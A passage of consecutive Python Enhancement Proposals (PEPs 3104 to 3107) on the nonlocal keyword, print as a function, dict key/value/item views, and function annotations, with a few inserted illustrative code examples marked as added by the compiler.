this limitation so that Python can have the full flexibility of the
Algol-style scoping model that is now standard in many programming
languages, including JavaScript, Perl, Ruby, Scheme, Smalltalk,
C with GNU extensions, and C# 2.0.
It has been argued that such a feature isn’t necessary, because
a rebindable outer variable can be simulated by wrapping it in a
mutable object:
class Namespace:
pass
def make_scoreboard(frame, score=0):
ns = Namespace()
ns.score = 0
label = Label(frame)
label.pack()
for i in [-10, -1, 1, 10]:
def increment(step=i):
ns.score = ns.score + step
label['text'] = ns.score
button = Button(frame, text='%+d' % i, command=increment)
button.pack()
return label
However, this workaround only highlights the shortcomings of existing
scopes: the purpose of a function is to encapsulate code in its own
namespace, so it seems unfortunate that the programmer should have to
create additional namespaces to make up for missing functionality in
the existing local scopes, and then have to decide whether each name
should reside in the real scope or the simulated scope.
Another common objection is that the desired functionality can be
written as a class instead, albeit somewhat more verbosely. One
rebuttal to this objection is that the existence of a different
implementation style is not a reason to leave a supported programming
construct (nested scopes) functionally incomplete. Python is
sometimes called a “multi-paradigm language” because it derives so
much strength, practical flexibility, and pedagogical power from its
support and graceful integration of multiple programming paradigms.
A proposal for scoping syntax appeared on Python-Dev as far back as
1994 [1], long before PEP 227’s support for nested scopes was
adopted. At the time, Guido’s response was:
This is dangerously close to introducing CSNS [classic static
nested scopes]. If you were to do so, your proposed semantics
of scoped seem alright. I still think there is not enough need
for CSNS to warrant this kind of construct …
After PEP 227, the “outer name rebinding discussion” has reappeared
on Python-Dev enough times that it has become a familiar event,
having recurred in its present form since at least 2003 [2].
Although none of the language changes proposed in these discussions
have yet been adopted, Guido has acknowledged that a language change
is worth considering [12].
Other Languages
To provide some background, this section describes how some other
languages handle nested scopes and rebinding.
JavaScript, Perl, Scheme, Smalltalk, GNU C, C# 2.0
These languages use variable declarations to indicate scope. In
JavaScript, a lexically scoped variable is declared with the var
keyword; undeclared variable names are assumed to be global. In
Perl, a lexically scoped variable is declared with the my
keyword; undeclared variable names are assumed to be global. In
Scheme, all variables must be declared (with define or let,
or as formal parameters). In Smalltalk, any block can begin by
declaring a list of local variable names between vertical bars.
C and C# require type declarations for all variables. For all these
cases, the variable belongs to the scope containing the declaration.
Ruby (as of 1.8)
Ruby is an instructive example because it appears to be the only
other currently popular language that, like Python, tries to support
statically nested scopes without requiring variable declarations, and
thus has to come up with an unusual solution. Functions in Ruby can
contain other function definitions, and they can also contain code
blocks enclosed in curly braces. Blocks have access to outer
variables, but nested functions do not. Within a block, an
assignment to a name implies a declaration of a local variable only
if it would not shadow a name already bound in an outer scope;
otherwise assignment is interpreted as rebinding of the outer name.
Ruby’s scoping syntax and rules have also been debated at great
length, and changes seem likely in Ruby 2.0 [28].
Overview of Proposals
There have been many different proposals on Python-Dev for ways to
rebind names in outer scopes. They all fall into two categories:
new syntax in the scope where the name is bound, or new syntax in
the scope where the name is used.
New Syntax in the Binding (Outer) Scope
Scope Override Declaration
The proposals in this category all suggest a new kind of declaration
statement similar to JavaScript’s var. A few possible keywords
have been proposed for this purpose:
scope x [4]
var x [4] [9]
my x [13]
In all these proposals, a declaration such as var x in a
particular scope S would cause all references to x in scopes
nested within S to refer to the x bound in S.
The primary objection to this category of proposals is that the
meaning of a function definition would become context-sensitive.
Moving a function definition inside some other block could cause any
of the local name references in the function to become nonlocal, due
to declarations in the enclosing block. For blocks in Ruby 1.8,
this is actually the case; in the following example, the two setters
have different effects even though they look identical:
setter1 = proc { | x | y = x } # y is local here
y = 13
setter2 = proc { | x | y = x } # y is nonlocal here
setter1.call(99)
puts y # prints 13
setter2.call(77)
puts y # prints 77
Note that although this proposal resembles declarations in JavaScript
and Perl, the effect on the language is different because in those
languages undeclared variables are global by default, whereas in
Python undeclared variables are local by default. Thus, moving
a function inside some other block in JavaScript or Perl can only
reduce the scope of a previously global name reference, whereas in
Python with this proposal, it could expand the scope of a previously
local name reference.
Required Variable Declaration
A more radical proposal [21] suggests removing Python’s scope-guessing
convention altogether and requiring that all names be declared in the
scope where they are to be bound, much like Scheme. With this
proposal, var x = 3 would both declare x to belong to the
local scope and bind it, whereas x = 3 would rebind the existing
visible x. In a context without an enclosing scope containing a
var x declaration, the statement x = 3 would be statically
determined to be illegal.
This proposal yields a simple and consistent model, but it would be
incompatible with all existing Python code.
New Syntax in the Referring (Inner) Scope
There are three kinds of proposals in this category.
Outer Reference Expression
This type of proposal suggests a new way of referring to a variable
in an outer scope when using the variable in an expression. One
syntax that has been suggested for this is .x [7], which would
refer to x without creating a local binding for it. A concern
with this proposal is that in many contexts x and .x could
be used interchangeably, which would confuse the reader [31]. A
closely related idea is to use multiple dots to specify the number
of scope levels to ascend [8], but most consider this too error-prone
[17].
Rebinding Operator
This proposal suggests a new assignment-like operator that rebinds
a name without declaring the name to be local [2]. Whereas the
statement x = 3 both declares x a local variable and binds
it to 3, the statement x := 3 would change the existing binding
of x without declaring it local.
This is a simple solution, but according to PEP 3099 it has been
rejected (perhaps because it would be too easy to miss or to confuse
with =).
Scope Override Declaration
The proposals in this category suggest a new kind of declaration
statement in the inner scope that prevents a name from becoming
local. This statement would be similar in nature to the global
statement, but instead of making the name refer to a binding in the
top module-level scope, it would make the name refer to the binding
in the nearest enclosing scope.
This approach is attractive due to its parallel with a familiar
Python construct, and because it retains context-independence for
function definitions.
This approach also has advantages from a security and debugging
perspective. The resulting Python would not only match the
functionality of other nested-scope languages but would do so with a
syntax that is arguably even better for defensive programming. In
most other languages, a declaration contracts the scope of an
existing name, so inadvertently omitting the declaration could yield
farther-reaching (i.e. more dangerous) effects than expected. In
Python with this proposal, the extra effort of adding the declaration
is aligned with the increased risk of non-local effects (i.e. the
path of least resistance is the safer path).
Many spellings have been suggested for such a declaration:
scoped x [1]
global x in f [3] (explicitly specify which scope)
free x [5]
outer x [6]
use x [9]
global x [10] (change the meaning of global)
nonlocal x [11]
global x outer [18]
global in x [18]
not global x [18]
extern x [20]
ref x [22]
refer x [22]
share x [22]
sharing x [22]
common x [22]
using x [22]
borrow x [22]
reuse x [23]
scope f x [25] (explicitly specify which scope)
The most commonly discussed choices appear to be outer,
global, and nonlocal. outer is already used as both a
variable name and an attribute name in the standard library. The
word global has a conflicting meaning, because “global variable”
is generally understood to mean a variable with top-level scope [27].
In C, the keyword extern means that a name refers to a variable
in a different compilation unit. While nonlocal is a bit long
and less pleasant-sounding than some of the other options, it does
have precisely the correct meaning: it declares a name not local.
Proposed Solution
The solution proposed by this PEP is to add a scope override
declaration in the referring (inner) scope. Guido has expressed a
preference for this category of solution on Python-Dev [14] and has
shown approval for nonlocal as the keyword [19].
The proposed declaration:
nonlocal x
prevents x from becoming a local name in the current scope. All
occurrences of x in the current scope will refer to the x
bound in an outer enclosing scope. As with global, multiple
names are permitted:
nonlocal x, y, z
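As an illustration (mine, not part of the original PEP text), the
declaration lets a closure rebind an enclosing name directly, without
the Namespace workaround shown earlier:
    def make_counter(start=0):
        count = start
        def increment(step=1):
            nonlocal count          # rebind 'count' in make_counter's scope
            count = count + step
            return count
        return increment

    bump = make_counter()
    print(bump(), bump(10))         # 1 11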
If there is no pre-existing binding in an enclosing scope, the
compiler raises a SyntaxError. (It may be a bit of a stretch to
call this a syntax error, but so far SyntaxError is used for all
compile-time errors, including, for example, __future__ import
with an unknown feature name.) Guido has said that this kind of
declaration in the absence of an outer binding should be considered
an error [16].
If a nonlocal declaration collides with the name of a formal
parameter in the local scope, the compiler raises a SyntaxError.
A shorthand form is also permitted, in which nonlocal is
prepended to an assignment or augmented assignment:
nonlocal x = 3
The above has exactly the same meaning as nonlocal x; x = 3.
(Guido supports a similar form of the global statement [24].)
On the left side of the shorthand form, only identifiers are allowed,
not target expressions like x[0]. Otherwise, all forms of
assignment are allowed. The proposed grammar of the nonlocal
statement is:
nonlocal_stmt ::=
"nonlocal" identifier ("," identifier)*
["=" (target_list "=")+ expression_list]
| "nonlocal" identifier augop expression_list
The rationale for allowing all these forms of assignment is that it
simplifies understanding of the nonlocal statement. Separating
the shorthand form into a declaration and an assignment is sufficient
to understand what it means and whether it is valid.
Note
The shorthand syntax was not added in the original implementation
of the PEP. Later discussions [29] [30] concluded this syntax
should not be implemented.
Backward Compatibility
This PEP targets Python 3000, as suggested by Guido [19]. However,
others have noted that some options considered in this PEP may be
small enough changes to be feasible in Python 2.x [26], in which
case this PEP could possibly be moved to be a 2.x series PEP.
As a (very rough) measure of the impact of introducing a new keyword,
here is the number of times that some of the proposed keywords appear
as identifiers in the standard library, according to a scan of the
Python SVN repository on November 5, 2006:
nonlocal 0
use 2
using 3
reuse 4
free 8
outer 147
global appears 214 times as an existing keyword. As a measure
of the impact of using global as the outer-scope keyword, there
are 18 files in the standard library that would break as a result
of such a change (because a function declares a variable global
before that variable has been introduced in the global scope):
cgi.py
dummy_thread.py
mhlib.py
mimetypes.py
idlelib/PyShell.py
idlelib/run.py
msilib/__init__.py
test/inspect_fodder.py
test/test_compiler.py
test/test_decimal.py
test/test_descr.py
test/test_dummy_threading.py
test/test_fileinput.py
test/test_global.py (not counted: this tests the keyword itself)
test/test_grammar.py (not counted: this tests the keyword itself)
test/test_itertools.py
test/test_multifile.py
test/test_scope.py (not counted: this tests the keyword itself)
test/test_threaded_import.py
test/test_threadsignals.py
test/test_warnings.py
References
[1] (1, 2)
Scoping (was Re: Lambda binding solved?) (Rafael Bracho)
https://legacy.python.org/search/hypermail/python-1994q1/0301.html
[2] (1, 2)
Extended Function syntax (Just van Rossum)
https://mail.python.org/pipermail/python-dev/2003-February/032764.html
[3]
Closure semantics (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2003-October/039214.html
[4] (1, 2)
Better Control of Nested Lexical Scopes (Almann T. Goo)
https://mail.python.org/pipermail/python-dev/2006-February/061568.html
[5]
PEP for Better Control of Nested Lexical Scopes (Jeremy Hylton)
https://mail.python.org/pipermail/python-dev/2006-February/061602.html
[6]
PEP for Better Control of Nested Lexical Scopes (Almann T. Goo)
https://mail.python.org/pipermail/python-dev/2006-February/061603.html
[7]
Using and binding relative names (Phillip J. Eby)
https://mail.python.org/pipermail/python-dev/2006-February/061636.html
[8]
Using and binding relative names (Steven Bethard)
https://mail.python.org/pipermail/python-dev/2006-February/061749.html
[9] (1, 2)
Lexical scoping in Python 3k (Ka-Ping Yee)
https://mail.python.org/pipermail/python-dev/2006-July/066862.html
[10]
Lexical scoping in Python 3k (Greg Ewing)
https://mail.python.org/pipermail/python-dev/2006-July/066889.html
[11]
Lexical scoping in Python 3k (Ka-Ping Yee)
https://mail.python.org/pipermail/python-dev/2006-July/066942.html
[12]
Lexical scoping in Python 3k (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/066950.html
[13]
Explicit Lexical Scoping (pre-PEP?) (Talin)
https://mail.python.org/pipermail/python-dev/2006-July/066978.html
[14]
Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/066991.html
[15] Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/066995.html
[16]
Lexical scoping in Python 3k (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/066968.html
[17]
Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/067004.html
[18] (1, 2, 3)
Explicit Lexical Scoping (pre-PEP?) (Andrew Clover)
https://mail.python.org/pipermail/python-dev/2006-July/067007.html
[19] (1, 2)
Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/067067.html
[20]
Explicit Lexical Scoping (pre-PEP?) (Matthew Barnes)
https://mail.python.org/pipermail/python-dev/2006-July/067221.html
[21]
Sky pie: a “var” keyword (a thread started by Neil Toronto)
https://mail.python.org/pipermail/python-3000/2006-October/003968.html
[22] (1, 2, 3, 4, 5, 6, 7)
Alternatives to ‘outer’ (Talin)
https://mail.python.org/pipermail/python-3000/2006-October/004021.html
[23]
Alternatives to ‘outer’ (Jim Jewett)
https://mail.python.org/pipermail/python-3000/2006-November/004153.html
[24]
Draft PEP for outer scopes (Guido van Rossum)
https://mail.python.org/pipermail/python-3000/2006-November/004166.html
[25]
Draft PEP for outer scopes (Talin)
https://mail.python.org/pipermail/python-3000/2006-November/004190.html
[26]
Draft PEP for outer scopes (Alyssa Coghlan)
https://mail.python.org/pipermail/python-3000/2006-November/004237.html
[27]
Global variable (version 2006-11-01T01:23:16)
https://en.wikipedia.org/w/index.php?title=Global_variable&oldid=85001451
[28]
Ruby 2.0 block local variable
https://web.archive.org/web/20070105131417/http://redhanded.hobix.com/inspect/ruby20BlockLocalVariable.html
[29]
Issue 4199: combining assignment with global & nonlocal (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2013-June/127142.html
[30]
Whatever happened to ‘nonlocal x = y’? (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2018-January/151627.html
[31]
Using and binding relative names (Almann T. Goo)
https://mail.python.org/pipermail/python-dev/2006-February/061761.html
Acknowledgements
The ideas and proposals mentioned in this PEP are gleaned from
countless Python-Dev postings. Thanks to Jim Jewett, Mike Orr,
Jason Orendorff, and Christian Tanzer for suggesting specific
edits to this PEP.
Copyright
This document has been placed in the public domain.
| Final | PEP 3104 – Access to Names in Outer Scopes | Standards Track | In most languages that support nested scopes, code can refer to or
rebind (assign to) any name in the nearest enclosing scope.
Currently, Python code can refer to a name in any enclosing scope,
but it can only rebind names in two scopes: the local scope (by
simple assignment) or the module-global scope (using a global
declaration). |
PEP 3105 – Make print a function
Author:
Georg Brandl <georg at python.org>
Status:
Final
Type:
Standards Track
Created:
19-Nov-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Specification
Backwards Compatibility
Implementation
References
Copyright
Abstract
The title says it all – this PEP proposes a new print() builtin
that replaces the print statement and suggests a specific signature
for the new function.
Rationale
The print statement has long appeared on lists of dubious language
features that are to be removed in Python 3000, such as Guido’s “Python
Regrets” presentation [1]. As such, the objective of this PEP is not
new, though it might become much disputed among Python developers.
The following arguments for a print() function are distilled from a
python-3000 message by Guido himself [2]:
print is the only application-level functionality that has a
statement dedicated to it. Within Python’s world, syntax is generally
used as a last resort, when something can’t be done without help from
the compiler. Print doesn’t qualify for such an exception.
At some point in application development one quite often feels the need
to replace print output by something more sophisticated, like
logging calls or calls into some other I/O library. With a print()
function, this is a straightforward string replacement; today it is
a mess adding all those parentheses and possibly converting >>stream
style syntax.
Having special syntax for print puts up a much larger barrier for
evolution, e.g. a hypothetical new printf() function is not too
far fetched when it will coexist with a print() function.
There’s no easy way to convert print statements into another call
if one needs a different separator, not spaces, or none at all.
Also, there’s no easy way at all to conveniently print objects with
some other separator than a space.
If print() is a function, it would be much easier to replace it within
one module (just def print(*args):...) or even throughout a program
(e.g. by putting a different function in __builtin__.print). As it is,
one can do this by writing a class with a write() method and
assigning that to sys.stdout – that’s not bad, but definitely a much
larger conceptual leap, and it works at a different level than print.
Specification
The signature for print(), taken from various mailings and recently
posted on the python-3000 list [3] is:
def print(*args, sep=' ', end='\n', file=None)
A call like:
print(a, b, c, file=sys.stderr)
will be equivalent to today’s:
print >>sys.stderr, a, b, c
while the optional sep and end arguments specify what is printed
between and after the arguments, respectively.
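For example (my illustration of the signature above, as it behaves in
Python 3):
    import sys

    print('a', 'b', 'c')                      # a b c
    print('a', 'b', 'c', sep='-', end='!\n')  # a-b-c!
    print('to stderr', file=sys.stderr)       # written to sys.stderr, not stdout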
The softspace feature (a semi-secret attribute on files currently
used to tell print whether to insert a space before the first item)
will be removed. Therefore, there will not be a direct translation for
today’s:
print "a",
print
which will not print a space between the "a" and the newline.
Backwards Compatibility
The changes proposed in this PEP will render most of today’s print
statements invalid. Only those which incidentally feature parentheses
around all of their arguments will continue to be valid Python syntax
in version 3.0, and of those, only the ones printing a single
parenthesized value will continue to do the same thing. For example,
in 2.x:
>>> print ("Hello")
Hello
>>> print ("Hello", "world")
('Hello', 'world')
whereas in 3.0:
>>> print ("Hello")
Hello
>>> print ("Hello", "world")
Hello world
Luckily, as it is a statement in Python 2, print can be detected
and replaced reliably and non-ambiguously by an automated tool, so
there should be no major porting problems (provided someone writes the
mentioned tool).
Implementation
The proposed changes were implemented in the Python 3000 branch in the
Subversion revisions 53685 to 53704. Most of the legacy code in the
library has been converted too, but it is an ongoing effort to catch
every print statement that may be left in the distribution.
References
[1]
http://legacy.python.org/doc/essays/ppt/regrets/PythonRegrets.pdf
[2]
Replacement for print in Python 3.0 (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2005-September/056154.html
[3]
print() parameters in py3k (Guido van Rossum)
https://mail.python.org/pipermail/python-3000/2006-November/004485.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3105 – Make print a function | Standards Track | The title says it all – this PEP proposes a new print() builtin
that replaces the print statement and suggests a specific signature
for the new function. |
PEP 3106 – Revamping dict.keys(), .values() and .items()
Author:
Guido van Rossum
Status:
Final
Type:
Standards Track
Created:
19-Dec-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Introduction
Specification
Open Issues
References
Abstract
This PEP proposes to change the .keys(), .values() and .items()
methods of the built-in dict type to return a set-like or unordered
container object whose contents are derived from the underlying
dictionary rather than a list which is a copy of the keys, etc.; and
to remove the .iterkeys(), .itervalues() and .iteritems() methods.
The approach is inspired by that taken in the Java Collections
Framework [1].
Introduction
It has long been the plan to change the .keys(), .values() and
.items() methods of the built-in dict type to return a more
lightweight object than a list, and to get rid of .iterkeys(),
.itervalues() and .iteritems(). The idea is that code that currently
(in 2.x) reads:
for k, v in d.iteritems(): ...
should be rewritten as:
for k, v in d.items(): ...
(and similar for .itervalues() and .iterkeys(), except the latter is
redundant since we can write that loop as for k in d.)
Code that currently reads:
a = d.keys() # assume we really want a list here
(etc.) should be rewritten as
a = list(d.keys())
There are (at least) two ways to accomplish this. The original plan
was to simply let .keys(), .values() and .items() return an iterator,
i.e. exactly what iterkeys(), itervalues() and iteritems() return in
Python 2.x. However, the Java Collections Framework [1] suggests
that a better solution is possible: the methods return objects with
set behavior (for .keys() and .items()) or multiset (== bag) behavior
(for .values()) that do not contain copies of the keys, values or
items, but rather reference the underlying dict and pull their values
out of the dict as needed.
The advantage of this approach is that one can still write code like
this:
a = d.items()
for k, v in a: ...
# And later, again:
for k, v in a: ...
Effectively, iter(d.keys()) (etc.) in Python 3.0 will do what
d.iterkeys() (etc.) does in Python 2.x; but in most contexts we don’t
have to write the iter() call because it is implied by a for-loop.
The objects returned by the .keys() and .items() methods behave like
sets. The object returned by the values() method behaves like a much
simpler unordered collection – it cannot be a set because duplicate
values are possible.
Because of the set behavior, it will be possible to check whether two
dicts have the same keys by simply testing:
if a.keys() == b.keys(): ...
and similarly for .items().
These operations are thread-safe only to the extent that using them in
a thread-unsafe way may cause an exception but will not cause
corruption of the internal representation.
As in Python 2.x, mutating a dict while iterating over it using an
iterator has an undefined effect and will in most cases raise a
RuntimeError exception. (This is similar to the guarantees made by
the Java Collections Framework.)
The objects returned by .keys() and .items() are fully interoperable
with instances of the built-in set and frozenset types; for example:
set(d.keys()) == d.keys()
is guaranteed to be True (except when d is being modified
simultaneously by another thread).
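A short demonstration of the resulting behavior in Python 3 (the
example is mine, not part of the PEP):
    d1 = {'a': 1, 'b': 2}
    d2 = {'b': 3, 'c': 4}

    print(d1.keys() & d2.keys())        # {'b'} -- set intersection of key views
    print(d1.keys() | d2.keys())        # {'a', 'b', 'c'}
    print(set(d1.keys()) == d1.keys())  # True

    view = d1.keys()
    d1['z'] = 5
    print('z' in view)                  # True: views track the underlying dict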
Specification
I’m using pseudo-code to specify the semantics:
class dict:
# Omitting all other dict methods for brevity.
# The .iterkeys(), .itervalues() and .iteritems() methods
# will be removed.
def keys(self):
return d_keys(self)
def items(self):
return d_items(self)
def values(self):
return d_values(self)
class d_keys:
def __init__(self, d):
self.__d = d
def __len__(self):
return len(self.__d)
def __contains__(self, key):
return key in self.__d
def __iter__(self):
for key in self.__d:
yield key
# The following operations should be implemented to be
# compatible with sets; this can be done by exploiting
# the above primitive operations:
#
# <, <=, ==, !=, >=, > (returning a bool)
# &, |, ^, - (returning a new, real set object)
#
# as well as their method counterparts (.union(), etc.).
#
# To specify the semantics, we can specify x == y as:
#
# set(x) == set(y) if both x and y are d_keys instances
# set(x) == y if x is a d_keys instance
# x == set(y) if y is a d_keys instance
#
# and so on for all other operations.
class d_items:
def __init__(self, d):
self.__d = d
def __len__(self):
return len(self.__d)
def __contains__(self, (key, value)):
return key in self.__d and self.__d[key] == value
def __iter__(self):
for key in self.__d:
yield key, self.__d[key]
# As well as the set operations mentioned for d_keys above.
# However the specifications suggested there will not work if
# the values aren't hashable. Fortunately, the operations can
# still be implemented efficiently. For example, this is how
# intersection can be specified:
def __and__(self, other):
if isinstance(other, (set, frozenset, d_keys)):
result = set()
for item in other:
if item in self:
result.add(item)
return result
if not isinstance(other, d_items):
return NotImplemented
d = {}
if len(other) < len(self):
self, other = other, self
for item in self:
if item in other:
key, value = item
d[key] = value
return d.items()
# And here is equality:
def __eq__(self, other):
if isinstance(other, (set, frozenset, d_keys)):
if len(self) != len(other):
return False
for item in other:
if item not in self:
return False
return True
if not isinstance(other, d_items):
return NotImplemented
# XXX We could also just compare the underlying dicts...
if len(self) != len(other):
return False
for item in self:
if item not in other:
return False
return True
def __ne__(self, other):
# XXX Perhaps object.__ne__() should be defined this way.
result = self.__eq__(other)
if result is not NotImplemented:
result = not result
return result
class d_values:
def __init__(self, d):
self.__d = d
def __len__(self):
return len(self.__d)
def __contains__(self, value):
# This is slow, and it's what "x in y" uses as a fallback
# if __contains__ is not defined; but I'd rather make it
# explicit that it is supported.
for v in self:
if v == value:
return True
return False
def __iter__(self):
for key in self.__d:
yield self.__d[key]
def __eq__(self, other):
if not isinstance(other, d_values):
return NotImplemented
if len(self) != len(other):
return False
# XXX Sometimes this could be optimized, but these are the
# semantics: we can't depend on the values to be hashable
# or comparable.
olist = list(other)
for x in self:
try:
olist.remove(x)
except ValueError:
return False
assert olist == []
return True
def __ne__(self, other):
result = self.__eq__(other)
if result is not NotImplemented:
result = not result
return result
Notes:
The view objects are not directly mutable, but don’t implement
__hash__(); their value can change if the underlying dict is mutated.
The only requirements on the underlying dict are that it implements
__getitem__(), __contains__(), __iter__(), and __len__().
We don’t implement .copy() – the presence of a .copy()
method suggests that the copy has the same type as the original, but
that’s not feasible without copying the underlying dict. If you want
a copy of a specific type, like list or set, you can just pass one
of the above to the list() or set() constructor.
The specification implies that the order in which items
are returned by .keys(), .values() and .items() is the same (just as
it was in Python 2.x), because the order is all derived from the dict
iterator (which is presumably arbitrary but stable as long as a dict
isn’t modified). This can be expressed by the following invariant:
list(d.items()) == list(zip(d.keys(), d.values()))
Open Issues
Do we need more of a motivation? I would think that being able to do
set operations on keys and items without having to copy them should
speak for itself.
I’ve left out the implementation of various set operations. These
could still present small surprises.
It would be okay if multiple calls to d.keys() (etc.) returned the
same object, since the object’s only state is the dict to which it
refers. Is this worth having extra slots in the dict object for?
Should that be a weak reference or should the d_keys (etc.) object
live forever once created? Strawman: probably not worth the extra
slots in every dict.
Should d_keys, d_values and d_items have a public instance variable or
method through which one can retrieve the underlying dict? Strawman:
yes (but what should it be called?).
I’m soliciting better names than d_keys, d_values and d_items. These
classes could be public so that their implementations could be reused
by the .keys(), .values() and .items() methods of other mappings. Or
should they?
Should the d_keys, d_values and d_items classes be reusable?
Strawman: yes.
Should they be subclassable? Strawman: yes (but see below).
A particularly nasty issue is whether operations that are specified in
terms of other operations (e.g. .discard()) must really be implemented
in terms of those other operations; this may appear irrelevant but it
becomes relevant if these classes are ever subclassed. Historically,
Python has a really poor track record of specifying the semantics of
highly optimized built-in types clearly in such cases; my strawman is
to continue that trend. Subclassing may still be useful to add new
methods, for example.
I’ll leave the decisions (especially about naming) up to whoever
submits a working implementation.
| Final | PEP 3106 – Revamping dict.keys(), .values() and .items() | Standards Track | This PEP proposes to change the .keys(), .values() and .items()
methods of the built-in dict type to return a set-like or unordered
container object whose contents are derived from the underlying
dictionary rather than a list which is a copy of the keys, etc.; and
to remove the .iterkeys(), .itervalues() and .iteritems() methods. |
PEP 3107 – Function Annotations
Author:
Collin Winter <collinwinter at google.com>,
Tony Lownds <tony at lownds.com>
Status:
Final
Type:
Standards Track
Created:
02-Dec-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Fundamentals of Function Annotations
Syntax
Parameters
Return Values
Lambda
Accessing Function Annotations
Use Cases
Standard Library
pydoc and inspect
Relation to Other PEPs
Function Signature Objects (PEP 362)
Implementation
Rejected Proposals
References and Footnotes
Copyright
Abstract
This PEP introduces a syntax for adding arbitrary metadata annotations
to Python functions [1].
Rationale
Because Python’s 2.x series lacks a standard way of annotating a
function’s parameters and return values, a variety of tools
and libraries have appeared to fill this gap. Some
utilise the decorators introduced in PEP 318, while others parse a
function’s docstring, looking for annotations there.
This PEP aims to provide a single, standard way of specifying this
information, reducing the confusion caused by the wide variation in
mechanism and syntax that has existed until this point.
Fundamentals of Function Annotations
Before launching into a discussion of the precise ins and outs of
Python 3.0’s function annotations, let’s first talk broadly about
what annotations are and are not:
Function annotations, both for parameters and return values, are
completely optional.
Function annotations are nothing more than a way of associating
arbitrary Python expressions with various parts of a function at
compile-time.
By itself, Python does not attach any particular meaning or
significance to annotations. Left to its own, Python simply makes
these expressions available as described in Accessing Function
Annotations below.
The only way that annotations take on meaning is when they are
interpreted by third-party libraries. These annotation consumers
can do anything they want with a function’s annotations. For
example, one library might use string-based annotations to provide
improved help messages, like so:
def compile(source: "something compilable",
filename: "where the compilable thing comes from",
mode: "is this a single statement or a suite?"):
...
Another library might be used to provide typechecking for Python
functions and methods. This library could use annotations to
indicate the function’s expected input and return types, possibly
something like:
def haul(item: Haulable, *vargs: PackAnimal) -> Distance:
...
However, neither the strings in the first example nor the
type information in the second example have any meaning on their
own; meaning comes from third-party libraries alone.
Following from point 2, this PEP makes no attempt to introduce
any kind of standard semantics, even for the built-in types.
This work will be left to third-party libraries.
Syntax
Parameters
Annotations for parameters take the form of optional expressions that
follow the parameter name:
def foo(a: expression, b: expression = 5):
...
In pseudo-grammar, parameters now look like identifier [:
expression] [= expression]. That is, annotations always precede a
parameter’s default value and both annotations and default values are
optional. Just like how equal signs are used to indicate a default
value, colons are used to mark annotations. All annotation
expressions are evaluated when the function definition is executed,
just like default values.
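For instance (an illustrative sketch, not from the PEP; note() is an invented helper), the following shows that annotation expressions run exactly once, when the def statement executes:
def note(tag):
    print('evaluating annotation:', tag)
    return tag

def f(x: note('parameter x') = 0) -> note('return value'):
    return x

# Both messages appear at definition time; calling f() afterwards
# produces no further annotation-related output.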
Annotations for excess parameters (i.e., *args and **kwargs)
are indicated similarly:
def foo(*args: expression, **kwargs: expression):
...
Annotations for nested parameters always follow the name of the
parameter, not the last parenthesis. Annotating all parameters of a
nested parameter is not required:
def foo((x1, y1: expression),
(x2: expression, y2: expression)=(None, None)):
...
Return Values
The examples thus far have omitted how to annotate the
type of a function’s return value. This is done like so:
def sum() -> expression:
...
That is, the parameter list can now be followed by a literal ->
and a Python expression. Like the annotations for parameters, this
expression will be evaluated when the function definition is executed.
The grammar for function definitions [11] is now:
decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
decorators: decorator+
funcdef: [decorators] 'def' NAME parameters ['->' test] ':' suite
parameters: '(' [typedargslist] ')'
typedargslist: ((tfpdef ['=' test] ',')*
('*' [tname] (',' tname ['=' test])* [',' '**' tname]
| '**' tname)
| tfpdef ['=' test] (',' tfpdef ['=' test])* [','])
tname: NAME [':' test]
tfpdef: tname | '(' tfplist ')'
tfplist: tfpdef (',' tfpdef)* [',']
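A concrete definition exercising this grammar (an invented example, not taken from the PEP) might read:
def transmit(data: bytes, *frames: "one frame per element",
             **options: dict) -> "a status string":
    ...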
Lambda
lambda’s syntax does not support annotations. The syntax of
lambda could be changed to support annotations, by requiring
parentheses around the parameter list. However it was decided
[12] not to make this change because:
It would be an incompatible change.
Lambdas are neutered anyway.
The lambda can always be changed to a function.
Accessing Function Annotations
Once compiled, a function’s annotations are available via the
function’s __annotations__ attribute. This attribute is
a mutable dictionary, mapping parameter names to an object
representing the evaluated annotation expression.
There is a special key in the __annotations__ mapping,
"return". This key is present only if an annotation was supplied
for the function’s return value.
For example, the following annotation:
def foo(a: 'x', b: 5 + 6, c: list) -> max(2, 9):
...
would result in an __annotations__ mapping of
{'a': 'x',
'b': 11,
'c': list,
'return': 9}
The return key was chosen because it cannot conflict with the name
of a parameter; any attempt to use return as a parameter name
would result in a SyntaxError.
__annotations__ is an empty, mutable dictionary if there are no
annotations on the function or if the function was created from
a lambda expression.
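To illustrate how an annotation consumer might use this attribute, here is a hypothetical sketch of a type-checking decorator (not part of the PEP and not any real library's API):
import functools

def enforce(func):
    # Check positional and keyword arguments against the function's
    # annotations, where the annotation happens to be a type.
    hints = func.__annotations__
    names = func.__code__.co_varnames[:func.__code__.co_argcount]
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        for name, value in list(zip(names, args)) + list(kwargs.items()):
            expected = hints.get(name)
            if isinstance(expected, type) and not isinstance(value, expected):
                raise TypeError('%s must be %s' % (name, expected.__name__))
        return func(*args, **kwargs)
    return wrapper

@enforce
def repeat(text: str, times: int) -> str:
    return text * times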
Use Cases
In the course of discussing annotations, a number of use-cases have
been raised. Some of these are presented here, grouped by what kind
of information they convey. Also included are examples of existing
products and packages that could make use of annotations.
Providing typing information
Type checking ([3], [4])
Let IDEs show what types a function expects and returns ([16])
Function overloading / generic functions ([21])
Foreign-language bridges ([17], [18])
Adaptation ([20], [19])
Predicate logic functions
Database query mapping
RPC parameter marshaling ([22])
Other information
Documentation for parameters and return values ([23])
Standard Library
pydoc and inspect
